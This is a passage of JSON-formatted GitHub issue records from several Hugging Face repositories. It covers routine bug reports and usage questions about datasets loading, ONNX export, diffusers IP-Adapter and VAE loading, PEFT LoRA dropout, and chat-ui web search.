"user": "severo" }, { "repo": "huggingface/datasets", "number": 6848, "title": "Cant Downlaod Common Voice 17.0 hy-AM ", "body": "### Describe the bug\r\n\r\nI want to download Common Voice 17.0 hy-AM but it returns an error. \r\n```\r\n\r\nThe version_base parameter is not specified.\r\nPlease specify a compatability version level, or None.\r\nWill assume defaults for version 1.1\r\n @hydra.main(config_name='hfds_config', config_path=None)\r\n/usr/local/lib/python3.10/dist-packages/hydra/_internal/hydra.py:119: UserWarning: Future Hydra versions will no longer change working directory at job runtime by default.\r\nSee https://hydra.cc/docs/1.2/upgrades/1.1_to_1.2/changes_to_job_working_dir/ for more information.\r\n ret = run_job(\r\n/usr/local/lib/python3.10/dist-packages/datasets/load.py:1429: FutureWarning: The repository for mozilla-foundation/common_voice_17_0 contains custom code which must be executed to correctly load the dataset. You can inspect the repository content at https://hf.co/datasets/mozilla-foundation/common_voice_17_0\r\nYou can avoid this message in future by passing the argument `trust_remote_code=True`.\r\nPassing `trust_remote_code=True` will be mandatory to load this dataset from the next major release of `datasets`.\r\n warnings.warn(\r\nReading metadata...: 6180it [00:00, 133224.37it/s]les/s]\r\nGenerating train split: 0 examples [00:00, ? examples/s]\r\nHuggingFace datasets failed due to some reason (stack trace below).\r\nFor certain datasets (eg: MCV), it may be necessary to login to the huggingface-cli (via `huggingface-cli login`).\r\nOnce logged in, you need to set `use_auth_token=True` when calling this script.\r\n\r\nTraceback error for reference :\r\n\r\nTraceback (most recent call last):\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 1743, in _prepare_split_single\r\n example = self.info.features.encode_example(record) if self.info.features is not None else record\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/features/features.py\", line 1878, in encode_example\r\n return encode_nested_example(self, example)\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/features/features.py\", line 1243, in encode_nested_example\r\n {\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/features/features.py\", line 1243, in \r\n {\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/utils/py_utils.py\", line 326, in zip_dict\r\n yield key, tuple(d[key] for d in dicts)\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/utils/py_utils.py\", line 326, in \r\n yield key, tuple(d[key] for d in dicts)\r\nKeyError: 'sentence_id'\r\n\r\nThe above exception was the direct cause of the following exception:\r\n\r\nTraceback (most recent call last):\r\n File \"/workspace/nemo/scripts/speech_recognition/convert_hf_dataset_to_nemo.py\", line 358, in main\r\n dataset = load_dataset(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/load.py\", line 2549, in load_dataset\r\n builder_instance.download_and_prepare(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 1005, in download_and_prepare\r\n self._download_and_prepare(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 1767, in _download_and_prepare\r\n super()._download_and_prepare(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 1100, in _download_and_prepare\r\n self._prepare_split(split_generator, **prepare_split_kwargs)\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 1605, in _prepare_split\r\n for job_id, done, content in self._prepare_split_single(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 1762, in _prepare_split_single\r\n raise DatasetGenerationError(\"An error occurred while generating the dataset\") from e\r\ndatasets.exceptions.DatasetGenerationError: An error occurred while generating the dataset\r\n```\r\n\r\n### Steps to reproduce the bug\r\n\r\n```\r\nfrom datasets import load_dataset\r\n\r\ncv_17 = load_dataset(\"mozilla-foundation/common_voice_17_0\", \"hy-AM\")\r\n```\r\n\r\n### Expected behavior\r\n\r\nIt works fine with common_voice_16_1\r\n\r\n### Environment info\r\n\r\n- `datasets` version: 2.18.0\r\n- Platform: Linux-5.15.0-1042-nvidia-x86_64-with-glibc2.35\r\n- Python version: 3.11.6\r\n- `huggingface_hub` version: 0.22.2\r\n- PyArrow version: 15.0.2\r\n- Pandas version: 2.2.2\r\n- `fsspec` version: 2024.2.0", "url": "https://github.com/huggingface/datasets/issues/6848", "state": "open", "labels": [], "created_at": "2024-04-29T10:06:02Z", "updated_at": "2025-04-01T20:48:09Z", "comments": 3, "user": "mheryerznkanyan" }, { "repo": "huggingface/optimum", "number": 1839, "title": "why does ORTModelForCausalLM assume new input length is 1 when past_key_values is passed", "body": "https://github.com/huggingface/optimum/blob/c55f8824f58db1a2f1cfc7879451b4743b8f206b/optimum/onnxruntime/modeling_decoder.py#L649\r\n\r\n``` python\r\n def prepare_inputs_for_generation(self, input_ids, past_key_values=None, **kwargs):\r\n if past_key_values is not None:\r\n past_length = past_key_values[0][0].shape[2]\r\n # Some generation methods already pass only the last input ID\r\n if input_ids.shape[1] > past_length:\r\n remove_prefix_length = past_length\r\n else:\r\n # Default to old behavior: keep only final ID\r\n remove_prefix_length = input_ids.shape[1] - 1\r\n input_ids = input_ids[:, remove_prefix_length:]\r\n\r\n```\r\n\r\nwhile in non-onnx modeling, it's not.\r\n\r\nhttps://github.com/huggingface/transformers/blob/a98c41798cf6ed99e1ff17e3792d6e06a2ff2ff3/src/transformers/models/mistral/modeling_mistral.py#L1217\r\n\r\n```python\r\n # Keep only the unprocessed tokens:\r\n # 1 - If the length of the attention_mask exceeds the length of input_ids, then we are in a setting where\r\n # some of the inputs are exclusively passed as part of the cache (e.g. when passing input_embeds as\r\n # input)\r\n if attention_mask is not None and attention_mask.shape[1] > input_ids.shape[1]:\r\n input_ids = input_ids[:, -(attention_mask.shape[1] - past_length) :]\r\n # 2 - If the past_length is smaller than input_ids', then input_ids holds all input tokens. We can discard\r\n # input_ids based on the past_length.\r\n elif past_length < input_ids.shape[1]:\r\n input_ids = input_ids[:, past_length:]\r\n```", "url": "https://github.com/huggingface/optimum/issues/1839", "state": "open", "labels": [ "question", "onnxruntime" ], "created_at": "2024-04-29T07:06:04Z", "updated_at": "2024-10-14T12:28:51Z", "user": "cyh-ustc" }, { "repo": "huggingface/diffusers", "number": 7813, "title": "I feel confused about this TODO issue. how to pass timesteps as tensors? ", "body": "https://github.com/huggingface/diffusers/blob/235d34cf567e78bf958344d3132bb018a8580295/src/diffusers/models/unets/unet_2d_condition.py#L918\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/7813", "state": "closed", "labels": [ "stale" ], "created_at": "2024-04-29T03:46:21Z", "updated_at": "2024-11-23T00:19:17Z", "user": "ghost" }, { "repo": "huggingface/datasets", "number": 6846, "title": "Unimaginable super slow iteration", "body": "### Describe the bug\r\n\r\nAssuming there is a dataset with 52000 sentences, each with a length of 500, it takes 20 seconds to extract a sentence from the dataset\u2026\u2026\uff1fIs there something wrong with my iteration?\r\n\r\n### Steps to reproduce the bug\r\n\r\n```python\r\nimport datasets\r\nimport time\r\nimport random\r\n\r\nnum_rows = 52000\r\nnum_cols = 500\r\n\r\nrandom_input = [[random.randint(1, 100) for _ in range(num_cols)] for _ in range(num_rows)]\r\nrandom_output = [[random.randint(1, 100) for _ in range(num_cols)] for _ in range(num_rows)]\r\n\r\n\r\ns=time.time()\r\nd={'random_input':random_input,'random_output':random_output}\r\ndataset=datasets.Dataset.from_dict(d)\r\nprint('from dict',time.time()-s)\r\nprint(dataset)\r\n\r\n\r\nfor i in range(len(dataset)):\r\n aa=time.time()\r\n a,b=dataset['random_input'][i],dataset['random_output'][i]\r\n print(time.time()-aa)\r\n\r\n```\r\n\r\ncorresponding output\r\n```bash\r\nfrom dict 9.215498685836792\r\nDataset({\r\n features: ['random_input', 'random_output'],\r\n num_rows: 52000\r\n})\r\n19.129778146743774\r\n19.329464197158813\r\n19.27668261528015\r\n19.28557538986206\r\n19.247620582580566\r\n19.624247074127197\r\n19.28673791885376\r\n19.301053047180176\r\n19.290496110916138\r\n19.291821718215942\r\n19.357765197753906\r\n\r\n```\r\n\r\n### Expected behavior\r\n\r\nUnder normal circumstances, iteration should be very rapid as it does not involve the main tasks other than getting items\r\n\r\n### Environment info\r\n\r\n- `datasets` version: 2.19.0\r\n- Platform: Linux-3.10.0-1160.71.1.el7.x86_64-x86_64-with-glibc2.17\r\n- Python version: 3.10.13\r\n- `huggingface_hub` version: 0.21.4\r\n- PyArrow version: 15.0.0\r\n- Pandas version: 2.2.1\r\n- `fsspec` version: 2024.2.0", "url": "https://github.com/huggingface/datasets/issues/6846", "state": "closed", "labels": [], "created_at": "2024-04-28T05:24:14Z", "updated_at": "2024-05-06T08:30:03Z", "comments": 1, "user": "rangehow" }, { "repo": "huggingface/lerobot", "number": 112, "title": "Do we want to use `transformers`?", "body": "I'd really go against establishing transformers as a dependency of lerobot and importing their whole library just to use the `PretrainedConfig` (or even other components). I think in this case it's very overkill and wouldn't necessarily fit our needs right now. The class is ~1000 lines of code - which we can copy into our lib anyway - and looks way more mature and feature-rich than what \u2014 IMO \u2014 we need and have with the rest of our code base.\r\n\r\nCopying code is even part of [Transformers' philosophy](https://huggingface.co/blog/transformers-design-philosophy) \u2014 which we *do* copy.\r\n\r\n_Originally posted by @aliberts in https://github.com/huggingface/lerobot/pull/101#discussion_r1581860998_\r\n ", "url": "https://github.com/huggingface/lerobot/issues/112", "state": "closed", "labels": [ "question" ], "created_at": "2024-04-27T17:24:20Z", "updated_at": "2024-04-30T11:59:25Z", "user": "qgallouedec" }, { "repo": "huggingface/evaluate", "number": 582, "title": "How to pass generation_kwargs to the TextGeneration evaluator ?", "body": "How can I pass the generation_kwargs to TextGeneration evaluator ?", "url": "https://github.com/huggingface/evaluate/issues/582", "state": "open", "labels": [], "created_at": "2024-04-25T16:09:46Z", "updated_at": "2024-04-25T16:09:46Z", "user": "swarnava112" }, { "repo": "huggingface/chat-ui", "number": 1074, "title": "503 error ", "body": "Hello, I was trying to install the chat-ui \r\nI searched for any documentation to how to handle that on my vps\r\nerror 500 after build and not working with https although allow_insecure=false ", "url": "https://github.com/huggingface/chat-ui/issues/1074", "state": "closed", "labels": [ "support" ], "created_at": "2024-04-25T15:34:07Z", "updated_at": "2024-04-27T14:58:45Z", "comments": 1, "user": "abdalladorrah" }, { "repo": "huggingface/chat-ui", "number": 1073, "title": "Support for Llama-3-8B-Instruct model", "body": "hi,\r\nFor model meta-llama/Meta-Llama-3-8B-Instruct, it is unlisted, not sure when will be supported?\r\n\r\nhttps://github.com/huggingface/chat-ui/blob/3d83131e5d03e8942f9978bf595a7caca5e2b3cd/.env.template#L229\r\n\r\nthanks.", "url": "https://github.com/huggingface/chat-ui/issues/1073", "state": "open", "labels": [ "question", "models", "huggingchat" ], "created_at": "2024-04-25T14:03:35Z", "updated_at": "2024-04-30T05:47:05Z", "user": "cszhz" }, { "repo": "huggingface/chat-ui", "number": 1072, "title": "[v0.8.3] serper, serpstack API, local web search not working", "body": "## Context\r\n\r\nI have serper.dev API key, serpstack API key and I have put it correctly in my `.env.local` file.\r\n\r\n\"image\"\r\n\r\n## Issue\r\n\r\nHowever, even if I enable Web Search, it still does not reach out to those APIs, and shows me \"an error occured\" no the Web Search part.\r\n\r\n\"image\"\r\n\r\nI don't see calls reaching Serper and SerpStack as well.\r\n\r\n\"image\"\r\n\r\n\"image\"\r\n\r\nIt was working for a bit on `v0.8.2`, but then it stopped working there as well. Now, for `v.0.8.3`, it's not working at all. Am I missing something? I have tried using either of those APIs too, but it still does not work.\r\n\r\nPlease help.", "url": "https://github.com/huggingface/chat-ui/issues/1072", "state": "closed", "labels": [ "support" ], "created_at": "2024-04-25T13:24:40Z", "updated_at": "2024-05-09T16:28:15Z", "comments": 14, "user": "adhishthite" }, { "repo": "huggingface/diffusers", "number": 7775, "title": "How to input gradio settings in Python", "body": "Hi.\r\n\r\nI use **realisticStockPhoto_v20** on Fooocus with **sdxl_film_photography_style** lora and I really like the results.\r\nFooocus and other gradio implementations come with settings inputs that I want to utilize in Python as well. In particular, if this is my code:\r\n```\r\ndevice = \"cuda\"\r\nmodel_path = \"weights/realisticStockPhoto_v20.safetensors\"\r\n\r\npipe = StableDiffusionXLInpaintPipeline.from_single_file(\r\n model_path, \r\n torch_dtype=torch.float16, \r\n num_in_channels=4).to(device)\r\n\r\npipe.load_lora_weights(\".\", weight_name=\"weights/SDXL_FILM_PHOTOGRAPHY_STYLE_BetaV0.4.safetensors\", adapter_name=\"film\")\r\n```\r\nhow can I set the following settings/parameters in code?\r\n\r\n- Negative Prompt\r\n- Preset (initial, lcm, default, lighting, realistic, sai, anime)\r\n- Performance (quality, speed, extreme speed, lightning)\r\n- width-height\r\n- image number\r\n- output format\r\n- Style (Fooocus v2, fooocus photography, fooocus negative, foocus enhance, etc.)\r\n- Base Model\r\n- Refiner\r\n- Lora 1,2,3,4,5,...\r\n- Guidance scale\r\n- Image sharpness", "url": "https://github.com/huggingface/diffusers/issues/7775", "state": "closed", "labels": [], "created_at": "2024-04-25T08:43:20Z", "updated_at": "2024-11-20T00:07:26Z", "user": "levoz92" }, { "repo": "huggingface/chat-ui", "number": 1069, "title": "CohereForAI ChatTemplate", "body": "Now that there is official support for tgi in CohereForAI/c4ai-command-r-v01. How to use the chat template found in the tokenizer config for the ui. Or alternatively, is it possible to add in PROMPTS.md the correct template for cohere?", "url": "https://github.com/huggingface/chat-ui/issues/1069", "state": "open", "labels": [], "created_at": "2024-04-25T05:45:35Z", "updated_at": "2024-04-25T05:45:35Z", "comments": 0, "user": "yanivshimoni89" }, { "repo": "huggingface/transformers.js", "number": 727, "title": "Preferred citation of Transformers.js", "body": "### Question\n\nLove the package, and am using it in research - I am wondering, does there exist a preferred citation format for the package to cite it in papers?", "url": "https://github.com/huggingface/transformers.js/issues/727", "state": "open", "labels": [ "question" ], "created_at": "2024-04-24T23:07:20Z", "updated_at": "2024-04-24T23:21:13Z", "user": "ludgerpaehler" }, { "repo": "huggingface/diarizers", "number": 4, "title": "How to save the finetuned model as a .bin file?", "body": "Hi,\r\n\r\nI finetuned the pyannote-segmentation model for my usecase but it is saved as a model.safetensors file. Can I convert it to a pytorch_model.bin file? I am using whisperx to create speaker-aware transcripts and .safetensors isn't working with that library. Thanks!", "url": "https://github.com/huggingface/diarizers/issues/4", "state": "closed", "labels": [], "created_at": "2024-04-24T20:50:19Z", "updated_at": "2024-04-30T21:02:32Z", "user": "anuragrawal2024" }, { "repo": "huggingface/transformers.js", "number": 725, "title": "How to choose a language's dialect when using `automatic-speech-recognition` pipeline?", "body": "### Question\r\n\r\nHi, so I was originally using the transformers library (python version) in my backend, but when refactoring my application for scale. It made more sense to move my implementation of whisper from the backend to the frontend (for my specific usecase). So I was thrilled when I saw that transformers.js supported whisper via the `automatic-speech-recognition` pipeline. However I'm a little confused by the implementation and the documentation left me with the question in the title.\r\n\r\nHow to choose a language's dialect when using `automatic-speech-recognition` pipeline?\r\n\r\nIn the python implementation of whisper, you don't have to specify the language being spoken as long as you're using the correct model size for multilingual support. But from your examples on transformers.js, it seems like you do in the js implementation.\r\n\r\n```\r\nconst transcriber = await pipeline('automatic-speech-recognition', 'Xenova/whisper-small');\r\nconst url = 'https://huggingface.co/datasets/Xenova/transformers.js-docs/resolve/main/french-audio.mp3';\r\nconst output = await transcriber(url, { language: 'french', task: 'transcribe' });\r\n// { text: \" J'adore, j'aime, je n'aime pas, je d\u00e9teste.\" }\r\n```\r\n\r\nHowever there's no list of supported languages, beyond what you can find on the whisper github repo. That's usually not a problem. But how do you deal with a language like Chinese, that has two main dialects; Mandarin and Cantonese. In python, I didn't have to worry about it, but in js, it seems to be a potential issue.\r\n\r\nPlease help. Any guidance will be appreciated.", "url": "https://github.com/huggingface/transformers.js/issues/725", "state": "closed", "labels": [ "question" ], "created_at": "2024-04-24T09:44:38Z", "updated_at": "2025-11-06T20:36:01Z", "user": "jquintanilla4" }, { "repo": "huggingface/text-embeddings-inference", "number": 248, "title": "how to support gpu version 10.1 rather than 12.2", "body": "### Feature request\n\nhow to support gpu version 10.1 rather than 12.2\n\n### Motivation\n\nhow to support gpu version 10.1 rather than 12.2\n\n### Your contribution\n\nhow to support gpu version 10.1 rather than 12.2", "url": "https://github.com/huggingface/text-embeddings-inference/issues/248", "state": "closed", "labels": [], "created_at": "2024-04-24T08:49:45Z", "updated_at": "2024-04-26T13:02:44Z", "user": "fanqiangwei" }, { "repo": "huggingface/diffusers", "number": 7766, "title": "IP-Adapter FaceID PLus How to use questions", "body": "https://github.com/huggingface/diffusers/blob/9ef43f38d43217f690e222a4ce0239c6a24af981/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion.py#L492\r\n\r\n## error msg:\r\n pipe.unet.encoder_hid_proj.image_projection_layers[0].clip_embeds = clip_embeds.to(dtype=torch.float16)\r\n AttributeError: 'list' object has no attribute 'to'\r\n\r\nhi\uff01\r\nI'm having some problems using the ip adapter FaceID PLus. Can you help me answer these questions? Thank you very much\r\n\r\n1. first question: What should I pass in the `ip_adapter_image` parameter in the `prepare_ip_adapter_image_embeds` function\r\n2. second question: What problem does this cause when the following code does not match in the merge code link below and in the example in the ip_adapter.md file \r\nthis is merge link: \r\n https://github.com/huggingface/diffusers/pull/7186#issuecomment-1986961595\r\nDifferential code:\r\n ```\r\n ref_images_embeds = torch.stack(ref_images_embeds, dim=0).unsqueeze(0)\r\n neg_ref_images_embeds = torch.zeros_like(ref_images_embeds)\r\n id_embeds = torch.cat([neg_ref_images_embeds, ref_images_embeds]).to(dtype=torch.float16, device=\"cuda\"))\r\n ```\r\n@yiyixuxu @fabiorigano \r\n\r\n## os:\r\ndiffusers==diffusers-0.28.0.dev0\r\n\r\n## this is my code:\r\n\r\n```\r\n# @FileName\uff1aStableDiffusionIpAdapterFaceIDTest.py\r\n# @Description\uff1a\r\n# @Author\uff1adyh\r\n# @Time\uff1a2024/4/24 11:45\r\n# @Website\uff1awww.xxx.com\r\n# @Version\uff1aV1.0\r\nimport cv2\r\nimport numpy as np\r\nimport torch\r\nfrom PIL import Image\r\nfrom diffusers import StableDiffusionPipeline\r\nfrom insightface.app import FaceAnalysis\r\nfrom transformers import CLIPVisionModelWithProjection\r\n\r\nmodel_path = '../../../aidazuo/models/Stable-diffusion/stable-diffusion-v1-5'\r\nclip_path = '../../../aidazuo/models/CLIP-ViT-H-14-laion2B-s32B-b79K'\r\nip_adapter_path = '../../../aidazuo/models/IP-Adapter-FaceID'\r\nip_img_path = '../../../aidazuo/jupyter-script/test-img/vermeer.png'\r\n\r\n\r\ndef extract_face_features(image_lst: list, input_size: tuple):\r\n # Extract Face features using insightface\r\n ref_images = []\r\n app = FaceAnalysis(name=\"buffalo_l\",\r\n root=ip_adapter_path,\r\n providers=['CUDAExecutionProvider', 'CPUExecutionProvider'])\r\n\r\n app.prepare(ctx_id=0, det_size=input_size)\r\n for img in image_lst:\r\n image = cv2.cvtColor(np.asarray(img), cv2.COLOR_BGR2RGB)\r\n faces = app.get(image)\r\n image = torch.from_numpy(faces[0].normed_embedding)\r\n ref_images.append(image.unsqueeze(0))\r\n ref_images = torch.cat(ref_images, dim=0)\r\n\r\n return ref_images\r\n\r\n\r\nip_adapter_img = Image.open(ip_img_path)\r\n\r\nimage_encoder = CLIPVisionModelWithProjection.from_pretrained(\r\n clip_path,\r\n torch_dtype=torch.float16,\r\n use_safetensors=True\r\n)\r\n\r\npipe = StableDiffusionPipeline.from_pretrained(\r\n model_path,\r\n variant=\"fp16\",\r\n safety_checker=None,\r\n image_encoder=image_encoder,\r\n torch_dtype=torch.float16).to(\"cuda\")\r\n\r\nadapter_file_lst = [\"ip-adapter-faceid-plus_sd15.bin\"]\r\nadapter_weight_lst = [0.5]\r\n\r\npipe.load_ip_adapter(ip_adapter_path, subfolder=None, weight_name=adapter_file_lst)\r\npipe.set_ip_adapter_scale(adapter_weight_lst)\r\n\r\nface_id_embeds = extract_face_features([ip_adapter_img], ip_adapter_img.size)\r\n\r\nclip_embeds = pipe.prepare_ip_adapter_image_embeds(ip_adapter_image=[ip_adapter_img],\r\n ip_adapter_image_embeds=None,\r\n device='cuda',\r\n num_images_per_prompt=1,\r\n do_classifier_free_guidance=True)\r\n\r\npipe.unet.encoder_hid_proj.image_projection_layers[0].clip_embeds = clip_embeds.to(dtype=torch.float16)\r\npipe.unet.encoder_hid_proj.image_projection_layers[0].shortcut = False # True if Plus v2\r\n\r\ngenerator = torch.manual_seed(33)\r\nimages = pipe(\r\n prompt='a beautiful girl',\r\n ip_adapter_image_embeds=clip_embeds,\r\n negative_prompt=\"\",\r\n num_inference_steps=30,\r\n num_images_per_prompt=1,\r\n generator=generator,\r\n width=512,\r\n height=512).images\r\n\r\nprint(images)\r\n```\r\n\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/7766", "state": "closed", "labels": [], "created_at": "2024-04-24T07:56:38Z", "updated_at": "2024-11-20T00:02:30Z", "user": "Honey-666" }, { "repo": "huggingface/peft", "number": 1673, "title": "How to set Lora_dropout=0 when loading trained peft model for inference?", "body": "### System Info\n\npeft==0.10.0\r\ntransformers==4.39.3\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n\r\n```python\r\nclass Linear(nn.Module, LoraLayer): \r\n\r\n def forward(self, x: torch.Tensor, *args: Any, **kwargs: Any) -> torch.Tensor:\r\n self._check_forward_args(x, *args, **kwargs)\r\n adapter_names = kwargs.pop(\"adapter_names\", None)\r\n\r\n if self.disable_adapters:\r\n if self.merged:\r\n self.unmerge()\r\n result = self.base_layer(x, *args, **kwargs)\r\n elif adapter_names is not None:\r\n result = self._mixed_batch_forward(x, *args, adapter_names=adapter_names, **kwargs)\r\n elif self.merged:\r\n result = self.base_layer(x, *args, **kwargs)\r\n else:\r\n result = self.base_layer(x, *args, **kwargs)\r\n torch_result_dtype = result.dtype\r\n for active_adapter in self.active_adapters:\r\n if active_adapter not in self.lora_A.keys():\r\n continue\r\n lora_A = self.lora_A[active_adapter]\r\n lora_B = self.lora_B[active_adapter]\r\n dropout = self.lora_dropout[active_adapter]\r\n scaling = self.scaling[active_adapter]\r\n x = x.to(lora_A.weight.dtype)\r\n\r\n if not self.use_dora[active_adapter]:\r\n result = result + lora_B(lora_A(dropout(x))) * scaling\r\n else:\r\n x = dropout(x)\r\n result = result + self._apply_dora(x, lora_A, lora_B, scaling, active_adapter)\r\n\r\n result = result.to(torch_result_dtype)\r\n\r\n return result\r\n```\n\n### Expected behavior\n\nWe can see that `lora_dropout` in forward function is working the same way whether under train or inference mode.", "url": "https://github.com/huggingface/peft/issues/1673", "state": "closed", "labels": [], "created_at": "2024-04-24T07:47:19Z", "updated_at": "2024-05-10T02:22:17Z", "user": "flyliu2017" }, { "repo": "huggingface/optimum", "number": 1826, "title": "Phi3 support", "body": "### Feature request\n\nMicrosoft's new phi3 mode, in particular the 128K context mini model, is not supported by Optimum export. \r\n\r\nError is:\r\n\"ValueError: Trying to export a phi3 model, that is a custom or unsupported architecture, but no custom export configuration was passed as `custom_export_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type phi3 to be supported natively in the ONNX export.\"\n\n### Motivation\n\nPhi3-mini is potentially very significant as it has a large context but a small size. This could be used in lots of scenarios if it has good performance.\n\n### Your contribution\n\nUnlikely I could do a PR as ONNX work is not my forte.", "url": "https://github.com/huggingface/optimum/issues/1826", "state": "closed", "labels": [], "created_at": "2024-04-23T15:54:21Z", "updated_at": "2024-05-24T13:53:08Z", "comments": 4, "user": "martinlyons" }, { "repo": "huggingface/datasets", "number": 6830, "title": "Add a doc page for the convert_to_parquet CLI", "body": "Follow-up to https://github.com/huggingface/datasets/pull/6795. Useful for https://github.com/huggingface/dataset-viewer/issues/2742. cc @albertvillanova ", "url": "https://github.com/huggingface/datasets/issues/6830", "state": "closed", "labels": [ "documentation" ], "created_at": "2024-04-23T09:49:04Z", "updated_at": "2024-04-25T10:44:11Z", "comments": 0, "user": "severo" }, { "repo": "huggingface/transformers.js", "number": 723, "title": "404 when trying Qwen in V3", "body": "### Question\n\nThis is probably just because V3 is a work in progress, but I wanted to make sure.\r\n\r\nWhen trying to run Qwen 1.5 - 0.5B it works with the V2 script, but when swapping to V3 I get a 404 not found.\r\n\r\n```\r\ntype not specified for model. Using the default dtype: q8.\r\nGET https://huggingface.co/Xenova/Qwen1.5-0.5B-Chat/resolve/main/onnx/model_quantized.onnx 404 (Not Found)\r\n```\r\n\r\nIt seems V3 is looking for a file that was renamed 3 months ago.\r\n[Rename onnx/model_quantized.onnx to onnx/decoder_model_merged_quantized.onnx](https://huggingface.co/Xenova/Qwen1.5-0.5B-Chat/commit/09e055ac27002bb954137751b31376de79ae17a5)\r\n\r\nI've tried setting `dtype` to 16 and 32, which does change the URL it tries to get, but those URL's also do not exist :-D\r\n\r\ne.g. `https://huggingface.co/Xenova/Qwen1.5-0.5B-Chat/resolve/main/onnx/model_fp16.onnx` when using `dtype: 'fp16'`.\r\n\r\nIs there something I can do to make V3 find the correct files?\r\n\r\n(I'm still trying to find that elusive small model with a large context size to do document summarization with)", "url": "https://github.com/huggingface/transformers.js/issues/723", "state": "open", "labels": [ "question" ], "created_at": "2024-04-22T19:14:17Z", "updated_at": "2024-05-28T08:26:09Z", "user": "flatsiedatsie" }, { "repo": "huggingface/diffusers", "number": 7740, "title": "How to get config of single_file", "body": "Hi,\r\nIs there any way to get the equivalent of model_index.json from a single_file?", "url": "https://github.com/huggingface/diffusers/issues/7740", "state": "closed", "labels": [], "created_at": "2024-04-22T14:00:21Z", "updated_at": "2024-04-22T23:26:50Z", "user": "suzukimain" }, { "repo": "huggingface/diffusers", "number": 7724, "title": "RuntimeError: Error(s) in loading state_dict for AutoencoderKL: Missing Keys! How to solve? ", "body": "### Describe the bug\n\nI am trying to get a Lora to run locally on my computer by using this code: https://github.com/hollowstrawberry/kohya-colab and changing it to a local format. When I get to the loading of the models, it gives an error, It seems that the AutoEncoder model has changed but I do not know how to adjust this or solve this issue in any of the files. I am a very amateur coder, could some one still help me out? \n\n### Reproduction\n\nHere is the code: https://github.com/hollowstrawberry/kohya-colab\r\n\n\n### Logs\n\n```shell\nTraceback (most recent call last):\r\n File \"/Users/veravanderburg/Loras/kohya-trainer/train_network_wrapper.py\", line 9, in \r\n train(args)\r\n File \"/Users/veravanderburg/Loras/kohya-trainer/train_network.py\", line 168, in train\r\n text_encoder, vae, unet, _ = train_util.load_target_model(args, weight_dtype, accelerator)\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n File \"/Users/veravanderburg/Loras/kohya-trainer/library/train_util.py\", line 3149, in load_target_model\r\n text_encoder, vae, unet, load_stable_diffusion_format = _load_target_model(\r\n ^^^^^^^^^^^^^^^^^^^\r\n File \"/Users/veravanderburg/Loras/kohya-trainer/library/train_util.py\", line 3115, in _load_target_model\r\n text_encoder, vae, unet = model_util.load_models_from_stable_diffusion_checkpoint(args.v2, name_or_path, device)\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n File \"/Users/veravanderburg/Loras/kohya-trainer/library/model_util.py\", line 873, in load_models_from_stable_diffusion_checkpoint\r\n info = vae.load_state_dict(converted_vae_checkpoint)\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n File \"/Library/Frameworks/Python.framework/Versions/3.12/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 2153, in load_state_dict\r\n raise RuntimeError('Error(s) in loading state_dict for {}:\\n\\t{}'.format(\r\n\r\nRuntimeError: Error(s) in loading state_dict for AutoencoderKL:\r\n\tMissing key(s) in state_dict: \"encoder.mid_block.attentions.0.to_q.weight\", \"encoder.mid_block.attentions.0.to_q.bias\", \"encoder.mid_block.attentions.0.to_k.weight\", \"encoder.mid_block.attentions.0.to_k.bias\", \"encoder.mid_block.attentions.0.to_v.weight\", \"encoder.mid_block.attentions.0.to_v.bias\", \"encoder.mid_block.attentions.0.to_out.0.weight\", \"encoder.mid_block.attentions.0.to_out.0.bias\", \"decoder.mid_block.attentions.0.to_q.weight\", \"decoder.mid_block.attentions.0.to_q.bias\", \"decoder.mid_block.attentions.0.to_k.weight\", \"decoder.mid_block.attentions.0.to_k.bias\", \"decoder.mid_block.attentions.0.to_v.weight\", \"decoder.mid_block.attentions.0.to_v.bias\", \"decoder.mid_block.attentions.0.to_out.0.weight\", \"decoder.mid_block.attentions.0.to_out.0.bias\". \r\n\tUnexpected key(s) in state_dict: \"encoder.mid_block.attentions.0.key.bias\", \"encoder.mid_block.attentions.0.key.weight\", \"encoder.mid_block.attentions.0.proj_attn.bias\", \"encoder.mid_block.attentions.0.proj_attn.weight\", \"encoder.mid_block.attentions.0.query.bias\", \"encoder.mid_block.attentions.0.query.weight\", \"encoder.mid_block.attentions.0.value.bias\", \"encoder.mid_block.attentions.0.value.weight\", \"decoder.mid_block.attentions.0.key.bias\", \"decoder.mid_block.attentions.0.key.weight\", \"decoder.mid_block.attentions.0.proj_attn.bias\", \"decoder.mid_block.attentions.0.proj_attn.weight\", \"decoder.mid_block.attentions.0.query.bias\", \"decoder.mid_block.attentions.0.query.weight\", \"decoder.mid_block.attentions.0.value.bias\", \"decoder.mid_block.attentions.0.value.weight\".\n```\n\n\n### System Info\n\nthat command does not work for me\n\n### Who can help?\n\n@saya", "url": "https://github.com/huggingface/diffusers/issues/7724", "state": "closed", "labels": [ "bug" ], "created_at": "2024-04-19T13:27:17Z", "updated_at": "2024-04-22T08:45:24Z", 